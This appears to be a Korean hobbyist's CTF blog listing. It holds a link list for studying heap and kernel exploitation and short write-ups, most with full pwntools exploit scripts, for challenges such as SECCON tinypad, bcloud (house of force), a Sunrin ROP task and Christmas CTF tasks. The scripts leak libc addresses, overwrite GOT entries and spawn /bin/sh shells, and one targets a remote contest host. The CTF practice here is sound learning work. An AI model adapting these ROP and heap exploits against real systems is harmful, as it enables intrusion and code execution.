aht7525

공부할거 https://www.lazenca.net/pages/viewpage.action?pageId=1147929 https://www.kernel.org/doc/html/v4.16/userspace-api/seccomp_filter.html https://www.blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf https://github.com/saaramar/Deterministic_LFH https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version http://illmatics.com/Understanding_the_LFH.pdf https://yamoe.tistory.com/208 https://github.com/shellphish/how2heap/tree/master/glibc_2.25 https://github.com/bminor/glibc/blob/master/malloc/malloc.c https://defenit.kr/2019/10/21/Pwn/%E3%84%B4%20Research/%EC%BB%A4%EB%84%90_%EA%B8%B0%EC%B4%88/ https://theori.io/ https://github.com/ctf-wiki/ctf-challenges https://github.com/N4NU/Reversing-Challenges-List https://www.lazenca.net/ https://github.com/topics/ctf-challenges https://www.slideshare.net/AngelBoy1 https://bases-hacking.org/ https://www.lazenca.net/display/TEC/01.Development+of+Kernel+Module https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/basic_knowledge/

2016-Seccon-tinypad house of einherjar 문제이다. [Exploit 방법] heap 주소와 libc의 주소를 릭 strlen으로 chunk안의 문자의 개수를 판단하고 입력을 함 heap에 쓰레기 값을 다른 heap의 사이즈 앞까지 넣음(poison-null-byte) house of einherjar을 사용 ​ prev_size(할당된 힙의 주소-0x10-할당할 위치)로 변경 그리고 prev_inuse를 0으로 만듬 tinypad주소에 할당 environ 주소로 stack leak main의 ret부분을 구해서... [Read More]

Sunrin - simple 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273from pwn import * #context.log_level='debug' r=process('problem')e=ELF('problem')libc=e.libcsyscall='\x7b'#write='\xb9'#0x00000000004005fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret '''0x7ffff7ad9517 <__libc_fork+471>:       mov    eax,r13d0x7ffff7ad951a <__libc_fork+474>:       pop    rbx   0x7ffff7ad951b <__libc_fork+475>:    pop    r12   0x7ffff7ad951d <__libc_fork+477>:    pop    r13   0x7ffff7ad951f <__libc_fork+479>:    pop    r14   0x7ffff7ad9521 <__libc_fork+481>:    pop    r15   0x7ffff7ad9523 <__libc_fork+483>:    pop    rbp   0x7ffff7ad9524 <__libc_fork+484>:    ret''' payload='A'*0x38 payload+=p64(0x400601)payload+=p64(e.got['alarm'])payload+=p64(0xdeadbeef)payload+=p64(e.plt['read']) payload+=p64(0x400601)payload+=p64(e.got['read'])payload+=p64(0xdeadbeef)payload+=p64(e.plt['read']) payload+=p64(0x4005fc)payload+=p64(1)*4payload+=p64(e.plt['alarm'])payload+=p64(0)*6payload+=p64(0x400603)payload+=p64(1)payload+=p64(e.plt['read'])payload+=p64(0x400603)payload+=p64(0)payload+=p64(0x400601)payload+=p64(e.got['alarm'])*2payload+=p64(e.plt['alarm'])payload+=p64(0)*6payload+=p64(e.plt['read'])payload+=p64(e.symbols['main']) sleep(0.1)r.send(payload)sleep(0.1)r.send(p16(0x9517))sleep(0.1)r.send('\x5e')sleep(0.1)try:        leak=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['read']-0xe        log.info(hex(leak))except:        pass#raw_input()r.send(p16(0x9200))sleep(0.1) payload='A'*0x38payload+=p64(0x400603)payload+=p64(leak+list(libc.search("/bin/sh"))[0])payload+=p64(leak+libc.symbols['system'])r.send(payload) r.interactive()Colored by Color Scriptercs [Read More]

간단한 house_of_force문제이다. name을 입력하는 부분에서 heap 주소를 구할 수 있다. 그리고 Org와 Host를 입력하는 것을 잘 이용해 top_chunk를 덮을 수 있다. Top_chunk를 덮었으므로 내가 원하는 주소를 할당받을수 있다. 32bit : “원하는 주소”-8-top_chunk주소 64bit : “원하는 주소”-16-top_chunk주소 note_size를 받는부분을 할당받아 note_list를 덮어서 적당히 exploit하면 된다. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768from pwn import * def new(size,content):        sla('--->>','1')        sla('content:\n',str(size))        sla('content:\n',content) def edit(idx,content):        sla('>>','3')        sla('id:\n',str(idx))        sla('content:\n',content) def delete(idx):        sla('>>','4')        sla('id:\n',str(idx)) def syn():        sla('>>','5') r=process('./bcloud')e=ELF('./bcloud')libc=e.libc sla=lambda x,y : r.sendlineafter(x,y)sa=lambda x,y : r.sendafter(x,y)ru=lambda x : r.recvuntil(x)  sa('name:\n','A'*0x40)ru('A'*0x40)heap_base=u32(ru('!').replace('!','').ljust(4,'\x00'))-8log.info(hex(heap_base)) sa('Org:\n','A'*0x40)sla('Host:\n',p32(0xffffffff)) heap_list=0x804B120note_size=0x804B0A0 fake=note_size-0x8-(heap_base+0xd8)-4-4-7new(fake,'\n') payload=p32(8)*10+p32(heap_base+0x98)+p32(heap_base+8)payload+=p64(0)*10+p32(e.got['free'])+p32(e.got['atoi'])*2new(0x100,payload)edit(0,p32(e.plt['puts']))delete(2) libc_leak=u32(r.recv(4).ljust(4,'\x00'))-libc.symbols['atoi']log.info(hex(libc_leak)) edit(1,p32(libc_leak+libc.symbols['system']))r.recvuntil('>>')r.sendline('/bin/sh') r.interactive() edit(0,p32(e.plt['puts']))delete(2) libc_leak=u32(r.recv(4).ljust(4,'\x00'))-libc.symbols['atoi']log.info(hex(libc_leak)) edit(1,p32(libc_leak+libc.symbols['system']))r.recvuntil('>>')r.sendline('/bin/sh') r.interactive()Colored by Color Scriptercs [Read More]

Christmas CTF 1. Solo_test 간단한 ROP이다. 12345678910111213141516171819202122232425262728293031from pwn import * r=remote('115.68.235.72',1337)e=ELF('./solo_test')libc=e.libc sla=r.sendlineaftersa=r.sendafterpr=0x0000000000400b83 answer=['Me','No','CTF','Never','No']for i in range(len(answer)):    sla('>>',answer[i]) payload='A'*0x58payload+=p64(pr)payload+=p64(e.got['puts'])payload+=p64(e.plt['puts'])payload+=p64(e.symbols['solo'])sla('-->',payload) leak=u64(r.recvuntil('\x7f').replace('\x20','').ljust(8,'\x00'))-0x83cc0log.info(hex(leak)) payload='A'*0x58payload+=p64(leak+0x106ef8) sla('-->',payload) r.interactive() Colored by Color Scriptercs 2. babyseccomp mmap이 안걸려 있다. mmap으로 맵핑하고 Error based shellcoding 하면 될거 같아 1234567891011121314151617181920212223242526272829303132333435from pwn import *import string context.arch = 'amd64'#context.log_level="error" flag = 'XMAS{' for i in range(5, 100):    for j in string.printable:        shellcode =  shellcraft.mmap(0, 0x1000, 1, 1, 3, 0)        #p = remote("115.68.235.72", 23457)        p = process('./babyseccomp')        shellcode += '''\            go:            mov bl, [rax + {}]            what:            mov rcx, {}            cmp rbx,rcx            mov rax,0xdeadbeef            jnz go            jmp what        '''.format(i, ord(j))         p.sendafter(': ', asm(shellcode))         try:            p.recvuntil("Seg", timeout=2)            flag += j            print flag            p.close()            break        except:            p.close()            continueColored by Color Scriptercs 참고 : http://ipwn.kr/index.php/2019/07/01/isitdtu-ctf-2019-write-up/ 3. Welcome_rev 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798dword=[0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x621F,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x00D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x674ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68B3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D702EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0C70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]enc=[0x376740b3,0x94789c6e,0x66485793,0x56e8bf0e,0xd5f139c0] flag='XMAS{'flag_fake=''import string for i in string.printable:    if(dword[0xff^ord(i)] == 0xead54739):        print('0 : '+i)    if(dword[0xc6^ord(i)] == 0xcb61b38c):        print('1 : '+i)    if(dword[0x34^ord(i)] == 0x1ca7eafb):        print('2 : '+i)    if(dword[0xfb^ord(i)] == 0x94643b84):        print('3 : '+i) print('---')for i in string.printable:        if(dword[0xff^ord(i)] == 0x4db2615):                print('0 : '+i)        if(dword[0xea^ord(i)] == 0x6906c2fe):                print('1 : '+i)        if(dword[0x27^ord(i)] == 0x5edef90e):                print('2 : '+i)        if(dword[0xe8^ord(i)] == 0x9309ff9d):                print('3 : '+i)print('---')for i in string.printable:        if(dword[0xff^ord(i)] == 0x17b7be43):                print('0 : '+i)        if(dword[0xbc^ord(i)] == 0xbdbdf21):                print('1 : '+i)        if(dword[0x60^ord(i)] == 0x646ba8c0):                print('2 : '+i)        if(dword[0x57^ord(i)] == 0xedb8832):                print('3 : '+i)print('---')for i in string.printable:    if(dword[0xff^ord(i)] == 0xf9b9df6f):        print('0 : '+i)    if(dword[0x90^ord(i)] == 0x4e048354):        print('1 : '+i)    if(dword[0x74^ord(i)] == 0x83d385c7):        print('2 : '+i)    if(dword[0x02 ^ ord(i)] == 0xc0ba6cad):        print('3 : '+i) Colored by Color Scriptercs 시간안에 못푼거 adult seccomp https://pwn3r.tistory.com/entry/SECCON-2018-QUAL-Simple-memo?category=801826 여기 있는거 복붙한다. 하지만 조금 바꿔야 한다. 대충 사진에... [Read More]